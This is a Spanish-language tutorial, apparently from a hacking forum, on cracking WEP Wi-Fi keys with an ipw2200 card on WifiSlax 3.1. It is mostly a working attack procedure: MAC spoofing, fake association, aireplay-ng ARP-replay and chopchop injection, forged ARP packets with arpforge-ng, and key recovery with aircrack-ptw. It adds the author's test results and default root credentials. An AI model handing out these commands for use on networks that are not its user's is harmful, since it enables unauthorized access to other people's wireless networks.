You are on page 1of 5

RESUMEN IPW2200+WIFISLAX 3.

1 byNeOdEaTh INFORMACIN IPW2200: Podemos hacer ataques 1(autentificacion falsa), 2(seleccion interactiva del paquete a enviar), 3(reinyeccion de una ARP) y 4(chopchop). El de fragmentacin(A5) al parecer no funciona. PASOS: 1) DRIVER: Recarga driver ipw2200 y comprobar en el shell que sale. En que ethx aparece nuestra ipw2200 y si est activo rtap0 por defecto. 2) ESCANEO DE REDES: Verificar las redes a nuestro alcance e ir apuntando BSSID, canal y ESSID de los puntos de acceso. Para ello, escribir en el shell: airodump-ng rtap0 Una vez visto esto, pausamos con CONTROL+C o cerramos ventana. 3) CAPTURA: Iniciar airodump-ng de nuevo para capturar paquetes de una red especfica e ir guardndolos en un archivo.Utilizaremos rtap0 para capturarya que si utilizamos ethx ahora, luego no podremosinyectar con ethx. Para ello escribimos en un nuevo shell: airodump-ng -c canal -b bssid -w captura rtap0 ej: airodump-ng -c 11 -b 01:12:42:23:25:5F -w captura rtap0 4) ATAQUE: Es necesario que nuestra interface ethx est en modo managed, que por defecto lo est. Esto podemos verlo haciendo un "iwconfigethx" en un shell, si est en modo monitor habria que poner "iwconfigethxmodemanaged". Necesitamos que haya algn cliente conectado y permanezca asociado para conseguir un paquete vlido y luego poder reinyectarlo. Si el cliente se desconecta nos saldr un mensaje (Gotauth/deauthpackageisclientconnected?). Los clientes los veremos como STATION. Lo ideal ahora es que nos cambiemos la mac por seguridad. Para saber nuestra mac poner en un shellifconfigethx. Para cambiarla vamos a un shell y ponemos (macchanger --mac=XX:XX:XX:XX:XX:XXethx). Solo se puede cambiar a macs que empiecen por 00. Abrimos otra shell y los comandos seran estos: Opciones de ataque: 1)SIN CLIENTES: el cliente somos nosotros 1.1)ataque 1+ataque 3:En este caso en el ataque 3 el cliente somos nosotros. 1.2)ataque 1+ataque 4 (chopchop):En este caso lo que cambia es la parte del ataque 4, que es un poco mas engorrosa. En este caso el cliente tambin somos nosotros. 2)CON CLIENTES(ataque 3) : El cliente es el que est conectado. ---ATAQUES------------------ATAQUE 1: Asociacin falsa a la red Primero nos autentificamos falsamente en esa red(ataque 1)(da igual la key que pongamos): iwconfigethxessid "essid" key 1111111111111 channel "canal" Nota: El ataque 1 se hace as para esta tarjeta ya que si fuera otra seria: aireplay-ng -1 30 -e (nombre de ESSID) -a (MAC del AP a atacar) -h (nuestra MAC falsa) (interfaz). Lo malo de hacerlo con otro comando para esta tarjeta es que no vemos en la ventana si nos hemos asociado bien o no, simplemente puede que nos veamos en la ventana del airodump donde estamos

capturando como STATION y tambin podemos comprobar nuestra asocia cin al AP haciendo un iwconfig.

ATAQUE 3: Inyeccin aireplay-ng -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 ethx ej: aireplay-ng -3 -x 1024 -g 1000000 -b 00:13:4D:AC:22:44 -h 01:23:4F:AC:52:89 -i rtap0 eth1 Si va bien todo veremos como envia paquetes y la columna #Data del airodump va subiendo rpidamente. Nota: Si no funcionan los ataques, bajad el rate de la tarjeta a 1 Mb por segundo: iwconfig rtap0 rate 1M. Hay veces que no se podra. Tambin intentar el ataque 3 y despues el 1. Este ataque depende de muchos factores y hay veces que no se podr, el chopchop puede ser interesante. ATAQUE 4: Chopchop aireplay-ng -4 -a -b bssid -h cliente -i rtap0 ethx Cuando pregunte use thispacket ? le decimos Y. Cuando termine copiamos el nombre del arch ivo replay_dec..xor para usarlo en el siguiente comando y forjar el ARP que reinyectaremos despus. Ahora ponemos: arpforge-ng replay_dec..xor 1 mac del AP "cliente(nuestra mac)" 192.168.1.20 192.168.1.21 ficheroarp.cap De esta forma usamos el fichero xor anterior para hacer el ARP que se reinyectara para aumentar los paquetes. 1 es el valor de FROMDS Finalmente hacemos un ataque 2: aireplay-ng -2 r ficheroarp.capethx Cuando pregunte use thispacket ? le decimos Y Bueno, ahora ya vemos como empieza a inyectar paquetes y esperamos hasta que tengamos los suficientes. 5) descifrar CLAVE: Si todo ha ido bien deberemos tener un montn de paquetes en #Data. Lo suyo es 250.000 para una clave 128bits, y el doble para una mas grande....vamos, cuantos mas, mejor. Ponemos en un nuevo shell: Tenemos 3 opciones: a)aircrack-ptwcaptura.cap

Este es el ms rpido.

Si no funciona, probad con los siguientes: b)aircrack-ngcaptura.cap el ng es mas rpido que el ltimo el otro sera: c)aircrackcaptura.cap si no sabemos como se llama el archivo vamos al konqueror y vemos en /root como se llama el archivo. Segn los paquetes que tengamos, tardar mas o menos hasta que nos muestre la key. ------------------

Aqu teneis una correcin bajo mi experiencia. Pruebas: 1)Con un cliente conectado:he conseguido el ataque 1 y el 3 perfectamente. Es decir, me he autentificado en la red, he aparecido junto con el cliente y he inyectado con mi cliente falso. Los paquetes se cogen rpidamente. 2)Con un cliente conectado falsamente(es decir otro ordenador conectado con key inventada): He intentado simular el ataque 1 con otro ordenador. El resultado....no inyecta paquetes. Supongo que ser por lo que puse arriba, que necesitamos al menos un paquete vlido para reinyectar, y este, no lo conseguimos nunca. He podido notar que al poner el comando de aireplay para inyectar, me dice que la mac que le puse para el cliente no corresponde con la mia...claro. Intenta cambiarmela a la que le puse yo como cliente pero haciendo un ifconfig se ve que no lo ha hecho. Tambin puede ser este el fallo... As que me autentifico falsamente en la red y hago una inyeccin con mi mac. Me veo asociado al AP junto con el otro cliente falseado(ordenador2) y los paquetes #Data suben muy lentamente hasta que...chof! Empieza a reinyectar!!!!, Suben a toda ostia los paquetes. 3)Sin cliente conectado: Hago los ataques 1 y 3 estando solamente yo y me veo autentificado al AP con un iwconfig aunque no me veo en la captura del airodump hasta pasar un poco. Aun habiendo falseado mi mac aparezco con mi mac original no s por qu, pero al cabo de un rato ya aparece mi mac falseada. Despus desaparezco de STATION pero sigo asociado al parecer haciendo un iwconfig. Los paquetes han subido a 42 en 8 minutos. A los 9 minutos empieza la inyeccin a una velocidad aplastante, mucho ms rpido que las otras veces. :D En pocos minutos tengo mas de 300000 paquetes. Con el ataque 1 y 4 tambin lo consigo, en menos tiempo que el 1+3.

Nota: Bueno, aqu est mi experiencia. Las pruebas las he hecho en mi casa, bastante lejos de mi AP(D-link) con mi portatil ACER y la famosa ipw2200. La key era WEP 128bits. Intentar hacer otras pruebas con APs de otras marcas y mas lejos. Con el airoscript ipw2200 del wifislax 3.1, sin clientes conectados, el ataque 1+3, que es el primero de la lista, no funciona. Por qu? Pues porque nosotros tenemos una mac y el airoscript intenta reinyectar con la mac 11:22:33:44:55:66, que es una mac que no nos podemos poner nunca. A que al inyectar s paquetes, el aireplay no para de preguntarnos si est asociada la mac al AP. El airoscript general no funciona porque utiliza comandos generales que no valen para nuestra tarjeta. Me refiero al comando de autentificacin falsa por ejemplo. http://foro.elhacker.net/wireless_en_linux/manual_ipw2200wifislax_31t188582.0.html#ixzz1QW4hdw2u

Usaremos tres shell's. El proceso se hace en el orden que esta escrito. Shell 1 - Teclear: rmmod ipw2200 - Teclear: modprobe ipw2200 rtap_iface=1 (Ambos pasos son para activar los drivers de la ipw2200 que al parecer no se activan por defecto en el wifislax 3.0) - Teclear: iwconfig (para comprobar que existen las interfaces activas) - Si existen las interfaces, teclear: airodump-ng rtap0 (para ver cuales redes hay disponibles) - Oprimir: Control+C (para detener el proceso) - Teclear: airodump-ng c *# -w wep rtap0 (el smbolo *# debe ser sustituido por el nmero del canal de la red con mas poder que viene definido por la columna RXQ, entre mas alto mejor) Ejemplo: airodump ng c 6 -w wep rtap0 (wep es el nombre del archivo en el que capturaremos los paquetes. Shell 2 - Teclear: iwconfig eth1 essid NOMBRE DE LA RED EXACTAMENTE COMO ESTA ESCRITO key 11111111111 Ejemplo: iwconfig eth1 essid INFINITUM5362 key 11111111111 (Esto es para asociarnos) - Teclear: iwconfig (para comprobar que estamos asociados, veremos el nombre de la red a la que estamos asociados en la interfaz eth1, creo, esto no lo recuerdo bien) - Teclear: aireplay-ng -3 x 1024 g 1000000 b MAC OBJETIVO h MAC DE DONDE ESTAMOS REALIZANDO EL PROCESO i rtap0 eth1 Ejemplo: aireplay-ng -3 x 1024 g 1000000 b 00:18:3D:87:3S:35 h 00:73:7F:K2:87:53 i rtap0 eth1 (Esto es para comenzar a inyectar paquetes al accesspoint que es la mac objetivo) - Esperar a juntar por lo menos 20,000 paquetes en DATA Shell 3 - Teclear: aircrack-ptw wep-01.cap (vean que wep es el nombre del archivo que le indicamos al airodump para que guardara los paquetes, y se le agrega un guion y un numero que indica el numero de captura con el mismo nombre) - Listo!! La clave son los digitos hexadecimales que aparecen. Normalmente son solo numeros y son 10, si fuera una clave de 128 bits seran 26 digitos hexadecimales. Como siempre, dudas y sugerencias en los comentarios. Espero poder ayudarles.

ACTUALIZACION: El usuario y contrasea que pide es Username: root Password: toor

You might also like